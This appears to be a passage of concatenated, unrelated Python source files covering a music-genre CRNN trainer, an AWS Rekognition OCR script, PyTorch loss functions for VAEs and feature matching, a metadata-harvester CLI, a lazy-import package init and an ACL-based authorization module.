y <= 0, x - y < 0, x - y <= 0, x < 0, x <= 0, x == 0, y < 0, y <= 0, y == 0] """ t1 = [Eqt(t == 0) for t in symbols] # M=0, N=0 ts = Miscs.get_terms_fixed_coefs(symbols, term_siz, settings.ICOEFS) t2 = [Oct(t < 0) for t in ts] # +/M+/-N >0 t3 = [Oct(t <= 0) for t in ts] # +/M+/-N >=0 return t1 + t2 + t3
11590195
from keras import backend as K import os import time import h5py import sys from tagger_net import MusicTaggerCRNN from keras.optimizers import SGD import numpy as np from keras.utils import np_utils from math import floor from music_tagger_cnn import MusicTaggerCNN from sklearn.metrics import confusion_matrix import matplotlib.pyplot as plt from utils import save_data, load_dataset, save_dataset, sort_result, predict_label, load_gt, plot_confusion_matrix, extract_melgrams # Parameters to set TRAIN = 0 TEST = 1 SAVE_MODEL = 0 SAVE_WEIGHTS = 0 LOAD_MODEL = 0 LOAD_WEIGHTS = 1 # Dataset MULTIFRAMES = 1 SAVE_DB = 0 LOAD_DB = 0 # Model parameters nb_classes = 10 nb_epoch = 40 batch_size = 100 time_elapsed = 0 # GTZAN Dataset Tags tags = ['blues', 'classical', 'country', 'disco', 'hiphop', 'jazz', 'metal', 'pop', 'reggae', 'rock'] tags = np.array(tags) # Paths to set model_name = "crnn_net_adam_ours" model_path = "models_trained/" + model_name + "/" weights_path = "models_trained/" + model_name + "/weights/" train_songs_list = 'lists/train_songs_list_ours.txt' test_songs_list = 'lists/test_songs_list_ours.txt' #test_songs_list = 'lists/test_songs_gtzan_list.txt' # Create directories for the models & weights if not os.path.exists(model_path): os.makedirs(model_path) print 'Path created: ', model_path if not os.path.exists(weights_path): os.makedirs(weights_path) print 'Path created: ', weights_path # Divide the song into multiple frames of 29.1s or take the center crop. if MULTIFRAMES: train_gt_list = 'lists/train_gt_list_multiframes.txt' test_gt_list = 'lists/test_gt_ours.txt' else: train_gt_list = 'lists/train_gt_list.txt' test_gt_list = 'lists/test_gt_list.txt' # Data Loading if LOAD_DB: if MULTIFRAMES: print 'Loading dataset multiframe...' X_train, y_train, num_frames_train = load_dataset('') X_test, y_test, num_frames_test = load_dataset('') else: X_train, X_test, y_train, y_test = load_dataset('') # Compute mel-spectogram for all the frames else: X_train, y_train, num_frames_train = extract_melgrams(train_songs_list, MULTIFRAMES, process_all_song=False, num_songs_genre=20) print('X_train shape:', X_train.shape) X_test, y_test, num_frames_test = extract_melgrams(test_songs_list, MULTIFRAMES, process_all_song=False, num_songs_genre=10) print(X_train.shape, 'train samples') print(X_test.shape, 'test samples') y_train = np.array(y_train) y_test = np.array(y_test) if SAVE_DB: if MULTIFRAMES: save_dataset('music_dataset/music_dataset_multiframe_train.h5', X_train, y_train,num_frames_train) save_dataset('music_dataset/music_dataset_multiframe_test.h5', X_test,y_test,num_frames_test) else: save_dataset('music_dataset/music_dataset.h5', X_train, X_test, y_train, y_test) Y_train = np_utils.to_categorical(y_train, nb_classes) Y_test = np_utils.to_categorical(y_test, nb_classes) print 'Shape labels y_train: ', Y_train.shape print 'Shape labels y_test: ', Y_test.shape # Initialize model model = MusicTaggerCRNN(weights='msd', input_tensor=(1, 96, 1366)) #model = MusicTaggerCNN(weights='msd', input_tensor=(1, 96, 1366)) #sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) if LOAD_WEIGHTS: model.load_weights(weights_path+model_name+'_epoch_40.h5') model.summary() # Save model architecture if SAVE_MODEL: json_string = model.to_json() f = open(model_path+model_name+".json", 'w') f.write(json_string) f.close() # Train model if TRAIN: try: print ("Training the model") f_train = open(model_path+model_name+"_scores_training.txt", 'w') f_test = open(model_path+model_name+"_scores_test.txt", 'w') f_scores = open(model_path+model_name+"_scores.txt", 'w') for epoch in range(1,nb_epoch+1): t0 = time.time() print ("Number of epoch: " +str(epoch)+"/"+str(nb_epoch)) sys.stdout.flush() scores = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=1, verbose=1, validation_data=(X_test, Y_test)) time_elapsed = time_elapsed + time.time() - t0 print ("Time Elapsed: " +str(time_elapsed)) sys.stdout.flush() score_train = model.evaluate(X_train, Y_train, verbose=0) print('Train Loss:', score_train[0]) print('Train Accuracy:', score_train[1]) f_train.write(str(score_train)+"\n") score_test = model.evaluate(X_test, Y_test, verbose=0) print('Test Loss:', score_test[0]) print('Test Accuracy:', score_test[1]) f_test.write(str(score_test)+"\n") f_scores.write(str(score_train[0])+","+str(score_train[1])+","+str(score_test[0])+","+str(score_test[1]) + "\n") if SAVE_WEIGHTS and epoch % 5 == 0: model.save_weights(weights_path + model_name + "_epoch_" + str(epoch) + ".h5") print("Saved model to disk in: " + weights_path + model_name + "_epoch" + str(epoch) + ".h5") f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path+model_name+"_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() # Save files when an sudden close happens / ctrl C except: f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path + model_name + "_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() finally: f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path + model_name + "_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() if TEST: t0 = time.time() print 'Predicting...','\n' real_labels_mean = load_gt(test_gt_list) real_labels_frames = y_test results = np.zeros((X_test.shape[0], tags.shape[0])) predicted_labels_mean = np.zeros((num_frames_test.shape[0], 1)) predicted_labels_frames = np.zeros((y_test.shape[0], 1)) song_paths = open(test_songs_list, 'r').read().splitlines() previous_numFrames = 0 n=0 for i in range(0, num_frames_test.shape[0]): print song_paths[i] num_frames=num_frames_test[i] print 'Num_frames: ', str(num_frames),'\n' results[previous_numFrames:previous_numFrames+num_frames] = model.predict( X_test[previous_numFrames:previous_numFrames+num_frames, :, :, :]) for j in range(previous_numFrames,previous_numFrames+num_frames): #normalize the results total = results[j,:].sum() results[j,:]=results[j,:]/total sort_result(tags, results[j,:].tolist()) predicted_label_frames=predict_label(results[j,:]) predicted_labels_frames[n]=predicted_label_frames n+=1 print '\n',"Mean of the song: " results_song = results[previous_numFrames:previous_numFrames+num_frames] mean=results_song.mean(0) sort_result(tags, mean.tolist()) predicted_label_mean=predict_label(mean) predicted_labels_mean[i]=predicted_label_mean print '\n','Predicted label: ', str(tags[predicted_label_mean]),'\n' if predicted_label_mean != real_labels_mean[i]: print 'WRONG!!' previous_numFrames = previous_numFrames+num_frames #break print '\n\n\n' cnf_matrix_frames = confusion_matrix(real_labels_frames, predicted_labels_frames) plot_confusion_matrix(cnf_matrix_frames, classes=tags, title='Confusion matrix (frames)') cnf_matrix_mean = confusion_matrix(real_labels_mean, predicted_labels_mean) plot_confusion_matrix(cnf_matrix_mean, classes=tags, title='Confusion matrix (using mean)')
11590234
from numpy.fft import __file__ as FFT_FILE # https://github.com/numpy/numpy/issues/11456 # https://github.com/ContinuumIO/anaconda-issues/issues/9697 # https://github.com/IntelPython/mkl_fft/issues/11 # Still there (22.2.19) https://github.com/IntelPython/mkl_fft/issues/24 # Estimated that mkl=2019.3 is required (in the moment 2019.1) # $ conda env export --name=base | grep mkl # mkl=2019.1=144 with open(FFT_FILE) as f: if 'patch_fft = True' in f.read(): raise Exception( 'Your Numpy version uses MKL-FFT. That version causes ' f'segmentation faults. To fix it, open {FFT_FILE} and edit ' 'it such that `patch_fft = True` becomes `patch_fft = False`.' ) __all__ = [ 'array', 'io', 'math', 'notebook', 'testing', 'transform', 'utils', 'visualization', ] def _lazy_import_submodules(__path__, __name__, __package__): # Lazy import all subpackages # Note: define all subpackages in __all__ import sys import pkgutil import operator import importlib _available_submodules = list(map( operator.itemgetter(1), pkgutil.iter_modules(__path__) )) class _LazySubModule(sys.modules[__name__].__class__): # In py37 is the class not nessesary and __dir__ and __getattr__ are # enough. # See: https://snarky.ca/lazy-importing-in-python-3-7 def __dir__(self): ret = super().__dir__() return [*ret, *_available_submodules] def __getattr__(self, item): if item in _available_submodules: return importlib.import_module(f'{__package__}.{item}') else: atters = dir(self) + list(_available_submodules) atters = list(dict.fromkeys(atters)) # drop duplicates import difflib # Suggestions are sorted by their similarity. suggestions = difflib.get_close_matches( item, atters, cutoff=0, n=100 ) raise AttributeError(f'module {__package__} has no attribute' f' {item!r}.\n' f'Close matches: {suggestions!r}.') sys.modules[__name__].__class__ = _LazySubModule _lazy_import_submodules( __name__=__name__, __path__=__path__, __package__=__package__ )
11590250
import io import json import boto3 import numpy as np import os import pandas as pd import requests from PIL import Image, ImageFilter from lib import mwo_image_slicer client = boto3.client('rekognition') #instantiate AWS client test_imgs_path = "E:/MWO/mwo_data/data/test_data/" #test images folder if not os.path.exists("../output/blog_files/dataframes"): os.makedirs("../output/blog_files/dataframes") def convert_to_byte_array(img): """ Converts an image file to a byte array for use with the Rekognition API """ img_byte_arr = io.BytesIO() img.save(img_byte_arr, format='PNG') img_byte_arr = img_byte_arr.getvalue() return img_byte_arr def grey_min_max(img, min_grey=185): """ """ img = img.convert("L") img_px = img.load() for i in range(img.size[1]): for j in range(img.size[0]): if img_px[j,i] < min_grey: img_px[j,i] = 0 else: img_px[j,i] = 255 img.save("../data/test_data/testpx.jpg") return img #instantiate image tools for project print("loading image to slicer") mwo_slicer = mwo_image_slicer.mwoImageSlicer(client) #handles image slicing and OCR requests mwo_slicer.load_image(image="20171118200711_1.jpg") #set current image for handling #cut and save horizontal image slices to ../data/test_data/ print("slicing image horizontally and saving slices to ../data/test_data/") h_slices = mwo_slicer.slice_image_horizontal(mwo_slicer.current_img, save_img=True) #pass single horizontal slice of the screenshot to AWS and get result #the example blog uses row 1 horizontal_slice = Image.open("../data/test_data/horizontal_slice_1.jpg") horizontal_slice_arr = convert_to_byte_array(horizontal_slice) horizontal_slice_ocr_resp = client.detect_text(Image={"Bytes":horizontal_slice_arr}) print("writing JSON response to file") with open("../output/blog_files/ocr_responses/single_line_ocr_resp.json", "w") as outfile: json.dump(horizontal_slice_ocr_resp, outfile) #get detected words from OCR response text_line = [] text_words = [] for text_detected in horizontal_slice_ocr_resp["TextDetections"]: #print(text_detected["DetectedText"]) if text_detected["Type"] == "LINE": text_line.append(text_detected["DetectedText"]) elif text_detected["Type"] == "WORD": text_words.append(text_detected["DetectedText"]) print() print("line text \n", text_line) print("words text \n", text_words) #add line spacing for terminal output print() print() #greyscale and threshold horizontal image print("converting image to greyscale and threshing") horizontal_slice_grey = grey_min_max(horizontal_slice) horizontal_slice_grey_arr = convert_to_byte_array(horizontal_slice_grey) horizontal_slice_grey_ocr_resp = client.detect_text(Image={"Bytes":horizontal_slice_grey_arr}) print("writing JSON response to file") with open("../output/blog_files/ocr_responses/single_line_grey_ocr_resp.json", "w") as outfile: json.dump(horizontal_slice_grey_ocr_resp, outfile) #get detected words from OCR response text_line_grey = [] text_words_grey = [] for text_detected in horizontal_slice_grey_ocr_resp["TextDetections"]: #print(text_detected["DetectedText"]) if text_detected["Type"] == "LINE": text_line_grey.append(text_detected["DetectedText"]) elif text_detected["Type"] == "WORD": text_words_grey.append(text_detected["DetectedText"]) print() print("line text after greyscale and threshold \n", text_line_grey) print("words text after greyscale and threshold \n", text_words_grey) print("showing image before and after grey scale and threshold modifications") horizontal_slice.show() horizontal_slice_grey.show() #add line spacing for terminal output print() print() print("*"*50) #show delineation of single line vs full dataframe results print("Creating full dataframe from horizontal screenshot slices") #create entire dataframe using horizontal slices #no greyscale or threshing horizontal_slice_df = mwo_slicer.img_to_dataframe_h(mwo_slicer.current_img, save_img=True, thresh=False, save_df=True, save_name="h_method_df.txt", filepath="../output/blog_files/dataframes/") print(horizontal_slice_df) print() print("*"*50) print("Creating full dataframe from horizontal screenshot slices using threshing method") #create entire dataframe using horizontal slices #with greyscale and threshing horizontal_slice_thresh_df = mwo_slicer.img_to_dataframe_h(mwo_slicer.current_img, save_img=True, thresh=True, save_df=True, save_name="h_method_threshed_df.txt", filepath="../output/blog_files/dataframes/") print(horizontal_slice_thresh_df) ## Construct entire dataframe: first without resize and thresholding, second with resize and thresholding
11590274
import torch from thirdparty.implementation.oanet.core.utils import torch_skew_symmetric import numpy as np def batch_episym(x1, x2, F): batch_size, num_pts = x1.shape[0], x1.shape[1] x1 = torch.cat([x1, x1.new_ones(batch_size, num_pts, 1)], dim=-1).reshape(batch_size, num_pts, 3, 1) x2 = torch.cat([x2, x2.new_ones(batch_size, num_pts, 1)], dim=-1).reshape(batch_size, num_pts, 3, 1) F = F.reshape(-1, 1, 3, 3).repeat(1, num_pts, 1, 1) x2Fx1 = torch.matmul(x2.transpose(2, 3), torch.matmul( F, x1)).reshape(batch_size, num_pts) Fx1 = torch.matmul(F, x1).reshape(batch_size, num_pts, 3) Ftx2 = torch.matmul(F.transpose(2, 3), x2).reshape(batch_size, num_pts, 3) ys = x2Fx1**2 * ( 1.0 / (Fx1[:, :, 0]**2 + Fx1[:, :, 1]**2 + 1e-15) + 1.0 / (Ftx2[:, :, 0]**2 + Ftx2[:, :, 1]**2 + 1e-15)) return ys class MatchLoss(object): def __init__(self, config): self.loss_essential = config.loss_essential self.loss_classif = config.loss_classif self.use_fundamental = config.use_fundamental self.obj_geod_th = config.obj_geod_th self.geo_loss_margin = config.geo_loss_margin self.loss_essential_init_iter = config.loss_essential_init_iter def run(self, global_step, data, logits, e_hat): R_in, t_in, y_in, pts_virt = data['Rs'], data['ts'], data['ys'], data['virtPts'] # Get groundtruth Essential matrix e_gt_unnorm = torch.reshape(torch.matmul( torch.reshape(torch_skew_symmetric(t_in), (-1, 3, 3)), torch.reshape(R_in, (-1, 3, 3)) ), (-1, 9)) e_gt = e_gt_unnorm / torch.norm(e_gt_unnorm, dim=1, keepdim=True) ess_hat = e_hat if self.use_fundamental: ess_hat = torch.matmul(torch.matmul(data['T2s'].transpose( 1, 2), ess_hat.reshape(-1, 3, 3)), data['T1s']) # get essential matrix from fundamental matrix ess_hat = torch.matmul(torch.matmul(data['K2s'].transpose( 1, 2), ess_hat.reshape(-1, 3, 3)), data['K1s']).reshape(-1, 9) ess_hat = ess_hat / torch.norm(ess_hat, dim=1, keepdim=True) # Essential/Fundamental matrix loss pts1_virts, pts2_virts = pts_virt[:, :, :2], pts_virt[:, :, 2:] geod = batch_episym(pts1_virts, pts2_virts, e_hat) essential_loss = torch.min( geod, self.geo_loss_margin*geod.new_ones(geod.shape)) essential_loss = essential_loss.mean() # we do not use the l2 loss, just save the value for convenience L2_loss = torch.mean(torch.min( torch.sum(torch.pow(ess_hat - e_gt, 2), dim=1), torch.sum(torch.pow(ess_hat + e_gt, 2), dim=1) )) # Classification loss # The groundtruth epi sqr gt_geod_d = y_in[:, :, 0] is_pos = (gt_geod_d < self.obj_geod_th).type(logits.type()) is_neg = (gt_geod_d >= self.obj_geod_th).type(logits.type()) c = is_pos - is_neg classif_losses = - \ torch.log(torch.sigmoid(c * logits) + np.finfo(float).eps.item()) # balance num_pos = torch.relu(torch.sum(is_pos, dim=1) - 1.0) + 1.0 num_neg = torch.relu(torch.sum(is_neg, dim=1) - 1.0) + 1.0 classif_loss_p = torch.sum(classif_losses * is_pos, dim=1) classif_loss_n = torch.sum(classif_losses * is_neg, dim=1) classif_loss = torch.mean( classif_loss_p * 0.5 / num_pos + classif_loss_n * 0.5 / num_neg) precision = torch.mean( torch.sum((logits > 0).type(is_pos.type()) * is_pos, dim=1) / torch.sum((logits > 0).type(is_pos.type()) * (is_pos + is_neg), dim=1) ) recall = torch.mean( torch.sum((logits > 0).type(is_pos.type()) * is_pos, dim=1) / torch.sum(is_pos, dim=1) ) loss = 0 # Check global_step and add essential loss if self.loss_essential > 0 and global_step >= self.loss_essential_init_iter: loss += self.loss_essential * essential_loss if self.loss_classif > 0: loss += self.loss_classif * classif_loss return [loss, (self.loss_essential * essential_loss).item(), (self.loss_classif * classif_loss).item(), L2_loss.item(), precision.item(), recall.item()]
11590288
import re import os import pendulum from share import tasks from share.bin.util import command from share.harvest.scheduler import HarvestScheduler from share.models import SourceConfig def get_sourceconfig(name): try: return SourceConfig.objects.get(label=name) except SourceConfig.DoesNotExist: print('SourceConfig "{}" not found.'.format(name)) fuzzy = list(SourceConfig.objects.filter(label__icontains=name).values_list('label', flat=True)) if fuzzy: print('Did you mean?\n\t{}'.format('\n\t'.join(fuzzy))) return None @command('Fetch data to disk or stdout, using the specified SourceConfig') def fetch(args, argv): """ Usage: {0} fetch <sourceconfig> [<date> | --start=YYYY-MM-DD --end=YYYY-MM-DD] [--limit=LIMIT] [--print | --out=DIR] [--set-spec=SET] {0} fetch <sourceconfig> --ids <ids>... [--print | --out=DIR] Options: -l, --limit=NUMBER Limit the harvester to NUMBER of documents -p, --print Print results to stdout rather than to a file -o, --out=DIR The directory to store the fetched data in. Defaults to ./fetched/<sourceconfig> -s, --start=YYYY-MM-DD The date at which to start fetching data. -e, --end=YYYY-MM-DD The date at which to stop fetching data. --set-spec=SET The OAI setSpec to limit harvesting to. --ids IDs of specific records to fetch. """ config = get_sourceconfig(args['<sourceconfig>']) if not config: return -1 harvester = config.get_harvester(pretty=True) ids = args['<ids>'] if ids: gen = (harvester.fetch_by_id(id) for id in ids) else: kwargs = {k: v for k, v in { 'limit': int(args['--limit']) if args.get('--limit') else None, 'set_spec': args.get('--set-spec'), }.items() if v is not None} if not args['<date>'] and not (args['--start'] and args['--end']): gen = harvester.fetch(**kwargs) elif args['<date>']: gen = harvester.fetch_date(pendulum.parse(args['<date>']), **kwargs) else: gen = harvester.fetch_date_range(pendulum.parse(args['--start']), pendulum.parse(args['--end']), **kwargs) if not args['--print']: args['--out'] = args['--out'] or os.path.join(os.curdir, 'fetched', config.label) os.makedirs(args['--out'], exist_ok=True) for result in gen: if args['--print']: print('Harvested data with identifier "{}"'.format(result.identifier)) print(result.datum) print('\n') else: suffix = '.xml' if result.datum.startswith('<') else '.json' with open(os.path.join(args['--out'], re.sub(r'[:\\\/\?\*]', '', str(result.identifier))) + suffix, 'w') as fobj: fobj.write(result.datum) @command('Harvest data using the specified SourceConfig') def harvest(args, argv): """ Usage: {0} harvest <sourceconfig> [<date>] [options] {0} harvest <sourceconfig> [<date>] [options] {0} harvest <sourceconfig> --all [<date>] [options] {0} harvest <sourceconfig> (--start=YYYY-MM-DD --end=YYYY-MM-DD) [options] Options: -l, --limit=NUMBER Limit the harvester to NUMBER of documents -s, --start=YYYY-MM-DD The date at which to start fetching data. -e, --end=YYYY-MM-DD The date at which to stop fetching data. -q, --quiet Do not print out the harvested records --set-spec=SET The OAI setSpec to limit harvesting to. """ config = get_sourceconfig(args['<sourceconfig>']) if not config: return -1 kwargs = {k: v for k, v in { 'limit': int(args['--limit']) if args.get('--limit') else None, 'set_spec': args.get('--set-spec'), }.items() if v is not None} if not args['<date>'] and not (args['--start'] and args['--end']): gen = config.get_harvester().harvest(**kwargs) elif args['<date>']: gen = config.get_harvester().harvest_date(pendulum.parse(args['<date>']), **kwargs) else: gen = config.get_harvester().harvest_date_range(pendulum.parse(args['--start']), pendulum.parse(args['--end']), **kwargs) # "Spin" the generator but don't keep the documents in memory for datum in gen: if args['--quiet']: continue print(datum) @command('Create HarvestJobs for the specified SourceConfig') def schedule(args, argv): """ Usage: {0} schedule <sourceconfig> [<date> | (--start=YYYY-MM-DD --end=YYYY-MM-DD) | --complete] [--tasks | --run] {0} schedule [<date> | (--start=YYYY-MM-DD --end=YYYY-MM-DD) | --complete] [--tasks | --run] --all Options: -t, --tasks Spawn harvest tasks for each created job. -r, --run Run the harvest task for each created job. -a, --all Schedule jobs for all enabled SourceConfigs. -c, --complete Schedule all jobs between today and the SourceConfig's earliest date. -s, --start=YYYY-MM-DD The date at which to start fetching data. -e, --end=YYYY-MM-DD The date at which to stop fetching data. -j, --no-ingest Do not process harvested data. """ if not args['--all']: configs = [get_sourceconfig(args['<sourceconfig>'])] if not configs[0]: return -1 else: configs = SourceConfig.objects.exclude(disabled=True).exclude(source__is_deleted=True) kwargs = {k: v for k, v in { 'ingest': not args.get('--no-ingest'), }.items() if v is not None} claim_jobs = args['--run'] or args['--tasks'] jobs = [] for config in configs: scheduler = HarvestScheduler(config, claim_jobs=claim_jobs) if not (args['<date>'] or args['--start'] or args['--end']): jobs.append(scheduler.today()) elif args['<date>']: jobs.append(scheduler.date(pendulum.parse(args['<date>']))) else: jobs.extend(scheduler.range(pendulum.parse(args['--start']), pendulum.parse(args['--end']))) if not claim_jobs: return for job in jobs: if args['--run']: tasks.harvest.apply((), {'job_id': job.id, **kwargs}, retry=False, throw=True) elif args['--tasks']: tasks.harvest.apply_async((), {'job_id': job.id, **kwargs})
11590318
import torch from torch import nn import torch.nn.functional as F eps = 1e-7 class VAECriterion(nn.Module): """ Here we calculate the VAE loss VAE loss's math formulation is : E_{z~Q}[log(P(X|z))]-D[Q(z|X)||P(z)] which can be transformed into: ||X-X_{reconstructed}||^2/(\sigma)^2 - [<L2norm(u)>^2+<L2norm(diag(\Sigma))>^2 -<L2norm(diag(ln(\Sigma)))>^2-1] Our input is : x_sigma,x_reconstructed,x,z_mean,z_Sigma """ def __init__(self, discrete_dim=10, x_sigma=1, bce_reconstruction=True): """ :param discrete_dim : the dim for discrete latent variables :param x_sigma: :param bce_reconstruction: """ super(VAECriterion, self).__init__() self.x_sigma = x_sigma self.bce_reconstruction = bce_reconstruction self.disc_log_prior_param = torch.log( torch.tensor([1 / discrete_dim for i in range(discrete_dim)]).view(1, -1).float().cuda()) def forward(self, x, x_reconstructed, z_mean, z_log_sigma, disc_log_alpha): """ :param x: input & ground truth :param x_reconstructed: the reconstructed output by VAE :param z_mean: the mean of the continuous latent variable :param z_log_sigma : the log std of the continuous latent variable :param disc_log_alpha : the param list for the disc param :return: reconstruct_loss, continuous_kl_loss, disc_kl_loss_tensor """ batch_size = x.size(0) # calculate reconstruct loss, sum in instance, mean in batch # we use the Binary Cross Entropy loss to do calculation if self.bce_reconstruction: reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size) else: reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / ( 2 * batch_size * (self.x_sigma ** 2)) # calculate latent space KL divergence z_mean_sq = z_mean * z_mean z_log_sigma_sq = 2 * z_log_sigma z_sigma_sq = torch.exp(z_log_sigma_sq) continuous_kl_loss = 0.5 * torch.sum(z_mean_sq + z_sigma_sq - z_log_sigma_sq - 1) / batch_size # notice here we duplicate the 0.5 by each part # disc param : log(a1),...,log(an) type disc_kl_loss = torch.sum(torch.exp(disc_log_alpha) * (disc_log_alpha - self.disc_log_prior_param)) / batch_size return reconstruct_loss, continuous_kl_loss, disc_kl_loss class M1Criterion(nn.Module): def __init__(self, x_sigma=1, bce_reconstruction=True): super(M1Criterion, self).__init__() self.x_sigma = x_sigma self.bce_reconstruction = bce_reconstruction def forward(self, x, x_reconstructed, M1_mean, M1_log_sigma): batch_size = x.size(0) if self.bce_reconstruction: reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size) else: reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / ( 2 * batch_size * (self.x_sigma ** 2)) # calculate latent space KL divergence M1_mean_sq = M1_mean * M1_mean M1_log_sigma_sq = 2 * M1_log_sigma M1_sigma_sq = torch.exp(M1_log_sigma_sq) M1_continuous_kl_loss = 0.5 * torch.sum(M1_mean_sq + M1_sigma_sq - M1_log_sigma_sq - 1) / batch_size return reconstruct_loss, M1_continuous_kl_loss class M2Criterion(nn.Module): def __init__(self,discrete_dim=10): super(M2Criterion, self).__init__() self.disc_log_prior_param = torch.log( torch.tensor([1 / discrete_dim for i in range(discrete_dim)]).view(1, -1).float().cuda()) def forward(self, M2_mean,M2_log_sigma,disc_log_alpha): batch_size = M2_mean.size(0) # calculate latent space KL divergence M2_mean_sq = M2_mean * M2_mean M2_log_sigma_sq = 2 * M2_log_sigma M2_sigma_sq = torch.exp(M2_log_sigma_sq) M2_continuous_kl_loss = 0.5 * torch.sum(M2_mean_sq + M2_sigma_sq - M2_log_sigma_sq - 1) / batch_size disc_kl_loss = torch.sum(torch.exp(disc_log_alpha) * (disc_log_alpha - self.disc_log_prior_param)) / batch_size return M2_continuous_kl_loss, disc_kl_loss class ClsCriterion(nn.Module): def __init__(self): super(ClsCriterion, self).__init__() def forward(self, predict, label, batch_weight=None): """ :param predict: B*C log_softmax result :param label: B*C one-hot label :param batch_weight: B*1 0-1 weight for each item in a batch :return: cross entropy loss """ if batch_weight is None: cls_loss = -1 * torch.mean(torch.sum(predict * label, dim=1)) else: cls_loss = -1 * torch.mean(torch.sum(predict * label, dim=1) * batch_weight) return cls_loss class ReconstructionCriterion(nn.Module): """ Here we calculate the criterion for -log p(x|z), we list two forms, the binary cross entropy form as well as the mse loss form """ def __init__(self, x_sigma=1, bce_reconstruction=True): super(ReconstructionCriterion, self).__init__() self.x_sigma = x_sigma self.bce_reconstruction = bce_reconstruction def forward(self, x, x_reconstructed): batch_size = x.size(0) # calculate reconstruct loss, sum in instance, mean in batch # we use the Binary Cross Entropy loss to do calculation if self.bce_reconstruction: reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size) else: reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / ( 2 * batch_size * (self.x_sigma ** 2)) return reconstruct_loss class KLNormCriterion(nn.Module): def __init__(self): super(KLNormCriterion, self).__init__() def forward(self, z_mean_pre, z_log_sigma_pre, z_mean_gt=None, z_sigma_gt=None): batch_size = z_mean_pre.size(0) if z_mean_gt is None or z_sigma_gt is None: """ KL[N(z_mean_pre,z_sigma_pre)||N(0,I)] """ z_mean_sq = z_mean_pre * z_mean_pre z_log_sigma_sq = 2 * z_log_sigma_pre z_sigma_sq = torch.exp(z_log_sigma_sq) kl_loss = 0.5 * torch.sum(z_mean_sq + z_sigma_sq - z_log_sigma_sq - 1) / batch_size else: """ KL[N(z_mean_pre,z_sigma_pre)||N(z_mean_gt,z_sigma_gt)] """ z_log_sigma_sq_pre = 2 * z_log_sigma_pre z_sigma_sq_pre = torch.exp(z_log_sigma_sq_pre) z_log_sigma_sq_gt = 2 * torch.log(z_sigma_gt + 1e-4) z_sigma_sq_gt = z_sigma_gt ** 2 kl_loss = 0.5 * torch.sum(z_log_sigma_sq_gt - z_log_sigma_sq_pre + z_sigma_sq_pre / z_sigma_sq_gt + ( z_mean_pre - z_mean_gt) ** 2 / z_sigma_sq_gt - 1) / batch_size return kl_loss class KLDiscCriterion(nn.Module): """ calculate sum (j=1,...,K) D_KL[q(c_j|x)||p(c_j|x)] """ def __init__(self): super(KLDiscCriterion, self).__init__() def forward(self, disc_log_pre, disc_gt, qp_order=True): batch_size = disc_log_pre.size(0) disc_log_gt = torch.log(disc_gt + 1e-4) if qp_order: loss = torch.sum(torch.exp(disc_log_pre) * (disc_log_pre - disc_log_gt)) / batch_size else: loss = torch.sum(disc_gt * (disc_log_gt - disc_log_pre)) / batch_size return loss
11590431
from typing import Dict, Union, Tuple, List from flask import current_app from flask_security import current_user from werkzeug.exceptions import Unauthorized, Forbidden PERMISSIONS = ["create-children", "read", "read-children", "update", "delete"] ADMIN_ROLE = "admin" ADMIN_READER_ROLE = "admin-reader" # constants to allow access to certain groups EVERY_LOGGED_IN_USER = "every-logged-in-user" PRINCIPALS_TYPE = Union[str, Tuple[str], List[Union[str, Tuple[str]]]] class AuthModelMixin(object): def __acl__(self) -> Dict[str, PRINCIPALS_TYPE]: """ This function returns an access control list (ACL) for a instance of a model which is relevant for authorization. ACLs in FlexMeasures are inspired by Pyramid's resource ACLs. In an ACL, we list which principal (security contexts, see below) allow certain kinds of actions ― by mapping supported permissions to the required principals. # What is a principal / security context? In computer security, a "principal" is the security context of the authenticated user [1]. For example, within FlexMeasures, an accepted principal is "user:2", which denotes that the user should have ID 2 (more technical specifications follow below). # Example Here are some examples of principals mapped to permissions in a fictional ACL: { "create-children": "account:3", # Everyone in Account 3 can create child items (e.g. beliefs for a sensor) "read": EVERYONE, # Reading is available to every logged-in user "update": ["user:14", # This user can update, ... user:15"], # and also this user, ... "update": "account-role:MDC", # also people in such accounts can update "delete": ("account:3", "role:CEO"), # Only CEOs of Account 3 can delete } Such a list of principals can be checked with match_principals, see below. # Specifications of principals Within FlexMeasures, a principal is handled as a string, usually defining context and identification, like so: <context>:<identification>. Supported contexts are user and account IDs, as well as user and account roles. All of them feature in the example above. Iterable principal descriptors should be treated as follows: - a list contains OR-connected items, which can be principal or tuples of principals (one of the items in the list is sufficient to grant the permission) - a tuple contains AND-connected strings (you need all of the items in the list to grant the permission). # Row-level authorization This ACL approach to authorization is usually called "row-level authorization" ― it always requires an instance, from which to get the ACL. Unlike pyramid, we have not implemented table-level authorization, where a class also can provide an ACL. This works because we make use of the hierarchy in our model. The highest level (e.g. an account) is created by site-admins and usually not in the API, but CLI. For everything else, we can ask the ACL on an instance, if we can handle it like we intend to. For creation of instances (where there is no instance to ask), it makes sense to use the instance one level up to look up the correct permission ("create-children"). E.g. to create belief data for a sensor, we can check the "create-children" - permission on the sensor. [1] https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals#a-href-idw2k3tr-princ-whatawhat-are-security-principals """ return {} def check_access(context: AuthModelMixin, permission: str): """ Check if current user can access this auth context if this permission is required, either with admin rights or principal(s). Raises 401 or 403 otherwise. """ # check current user if permission not in PERMISSIONS: raise Forbidden(f"Permission '{permission}' cannot be handled.") if current_user.is_anonymous: raise Unauthorized() # check context if context is None: raise Forbidden( f"Context needs {permission}-permission, but no context was passed." ) if not isinstance(context, AuthModelMixin): raise Forbidden( f"Context {context} needs {permission}-permission, but is no AuthModelMixin." ) # look up principals acl = context.__acl__() principals: 